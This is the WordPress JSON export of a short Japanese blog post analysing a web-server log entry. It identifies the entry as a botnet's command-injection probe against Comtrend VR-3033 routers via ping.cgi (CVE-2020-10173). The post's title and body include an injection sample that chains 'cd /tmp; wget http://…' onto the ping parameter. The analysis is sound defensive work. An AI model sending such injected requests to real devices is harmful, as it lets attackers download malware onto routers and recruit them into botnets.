{"id":401,"date":"2026-04-18T14:20:40","date_gmt":"2026-04-18T05:20:40","guid":{"rendered":"https:\/\/falcon21.space\/kazuya\/work\/?p=401"},"modified":"2026-04-19T17:01:20","modified_gmt":"2026-04-19T08:01:20","slug":"get-ping-cgipingipaddressgoogle-frwget-http","status":"publish","type":"post","link":"https:\/\/falcon21.space\/kazuya\/work\/?p=401","title":{"rendered":"&#8220;GET \/ping.cgi?pingIpAddress=google.fr;wget%20http:\/\/"},"content":{"rendered":"\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<p>GET \/ping.cgi?pingIpAddress=google.fr<\/p>\n\n\n\n<p>GET\u30ea\u30af\u30a8\u30b9\u30c8\u306f\u3001\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u304cIoT\u30c7\u30d0\u30a4\u30b9\u3001<br>\u7279\u306bComtrend VR-3033\u30eb\u30fc\u30bf\u30fc\u3092\u6a19\u7684\u306b\u3059\u308b\u305f\u3081\u306b\u60aa\u7528\u3059\u308b\u30b3\u30de\u30f3\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027GET \/ping.cgi?pingIpAddress=google.fr\uff08CVE-2020-10173\uff09\u306e\u7279\u5fb4\u7684\u306a\u30b7\u30b0\u30cd\u30c1\u30e3\u3067\u3059<\/p>\n\n\n\n<p>\u3053\u306e\u8981\u8acb\u306e\u4e3b\u306a\u30dd\u30a4\u30f3\u30c8\uff1a<\/p>\n\n\n\n<p>\u8106\u5f31\u6027\u30e1\u30ab\u30cb\u30ba\u30e0\uff1a<br>\u3053\u306epingIpAddress\u30d1\u30e9\u30e1\u30fc\u30bf\u306f\u5165\u529b\u3092\u9069\u5207\u306b\u30b5\u30cb\u30bf\u30a4\u30ba\u3057\u306a\u3044\u305f\u3081\u3001\u653b\u6483\u8005\u306f\u60aa\u610f\u306e\u3042\u308b\u30b3\u30de\u30f3\u30c9\uff08\u591a\u304f\u306e\u5834\u5408\u3001;\u307e\u305f\u306f\u3092\u4f7f\u7528%20\uff09\u3092URL\u306b\u8ffd\u52a0\u3057\u3066\u3001\u30bf\u30fc\u30b2\u30c3\u30c8\u30c7\u30d0\u30a4\u30b9\u4e0a\u3067\u4efb\u610f\u306e\u30b3\u30fc\u30c9\u3092\u5b9f\u884c\u3067\u304d\u307e\u3059\u3002<\/p>\n\n\n\n<p>IoT\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u6d3b\u52d5\uff1a<br>\u3053\u306e\u7279\u5b9a\u306e\u6587\u5b57\u5217\u306f\u3001\u30eb\u30fc\u30bf\u30fc\u3092\u4fb5\u5bb3\u3059\u308b\u305f\u3081\u306b\u3001Mirai\u4e9c\u7a2e\u3084\u30b7\u30a7\u30eb\u30b9\u30af\u30ea\u30d7\u30c8\u306a\u3069\u306e\u8ffd\u52a0\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u30de\u30eb\u30a6\u30a7\u30a2\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\uff08\u4f8b\uff1aIoT\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u30ec\u30dd\u30fc\u30c82021\/2022-2023\uff09\u3067\u5e83\u304f\u89b3\u6e2c\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n\n\n\n<p>\u4e00\u822c\u7684\u306a\u30da\u30a4\u30ed\u30fc\u30c9\u69cb\u9020:\u653b\u6483\u8005\u306f\u3001ping \u30b3\u30de\u30f3\u30c9\u3092\u60aa\u610f\u306e\u3042\u308b\u30a2\u30af\u30b7\u30e7\u30f3\u3068\u9023\u9396\u3055\u305b\u308b\u3053\u3068\u304c\u3088\u304f\u3042\u308a\u307e\u3059\u3002\u4f8b: GET \/ping.cgi?pingIpAddress=google.fr;cd \/tmp; wget http:\/\/\u2026\u3002<br>\u5bfe\u8c61\u30c7\u30d0\u30a4\u30b9\uff1a\u3053\u306e\u8106\u5f31\u6027\u306f\u3001\u4e00\u822c\u7684\u306bComtrend VR-3033\u30eb\u30fc\u30bf\u30fc\u306b\u95a2\u9023\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n\n\n\n<p>\u30a6\u30a7\u30d6\u30ed\u30b0\u306b\u898b\u3089\u308c\u308b\u3053\u306e\u7a2e\u306e\u8981\u6c42\u306f\u3001\u901a\u5e38\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u6a5f\u5668\u4e0a\u3067\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\uff08RCE\uff09\u306e\u8106\u5f31\u6027\u3092\u60aa\u7528\u307e\u305f\u306f\u78ba\u8a8d\u3057\u3088\u3046\u3068\u3059\u308b\u8a66\u307f\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n","protected":false},"excerpt":{"rendered":"<p>GET \/ping.cgi?pingIpAddress=google.fr GET\u30ea\u30af\u30a8\u30b9\u30c8\u306f\u3001\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u304cIoT\u30c7\u30d0\u30a4\u30b9\u3001\u7279\u306bComtrend VR-3033\u30eb\u30fc\u30bf\u30fc\u3092\u6a19\u7684\u306b\u3059\u308b\u305f\u3081\u306b\u60aa\u7528\u3059\u308b\u30b3\u30de\u30f3\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29,19],"tags":[23],"class_list":["post-401","post","type-post","status-publish","format-standard","hentry","category-httpd-","category-19","tag-httpd"],"_links":{"self":[{"href":"https:\/\/falcon21.space\/kazuya\/work\/index.php?rest_route=\/wp\/v2\/posts\/401","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/falcon21.space\/kazuya\/work\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/falcon21.space\/kazuya\/work\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/falcon21.space\/kazuya\/work\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/falcon21.space\/kazuya\/work\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=401"}],"version-history":[{"count":1,"href":"https:\/\/falcon21.space\/kazuya\/work\/index.php?rest_route=\/wp\/v2\/posts\/401\/revisions"}],"predecessor-version":[{"id":402,"href":"https:\/\/falcon21.space\/kazuya\/work\/index.php?rest_route=\/wp\/v2\/posts\/401\/revisions\/402"}],"wp:attachment":[{"href":"https:\/\/falcon21.space\/kazuya\/work\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=401"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/falcon21.space\/kazuya\/work\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=401"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/falcon21.space\/kazuya\/work\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=401"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}